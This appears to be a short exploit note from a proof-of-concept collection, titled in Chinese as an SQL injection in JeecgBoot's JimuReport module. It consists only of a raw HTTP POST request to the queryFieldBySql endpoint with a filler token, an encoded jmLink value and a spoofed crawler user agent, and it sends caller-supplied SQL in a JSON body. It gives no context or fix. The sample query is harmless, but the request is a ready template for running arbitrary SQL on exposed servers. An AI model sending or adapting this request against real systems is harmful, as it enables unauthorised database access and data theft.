JeecgBoot积木报表存在SQL注入.md

POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/json
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.131.100:8088
Content-Length: 21

{"sql":"select '1' "}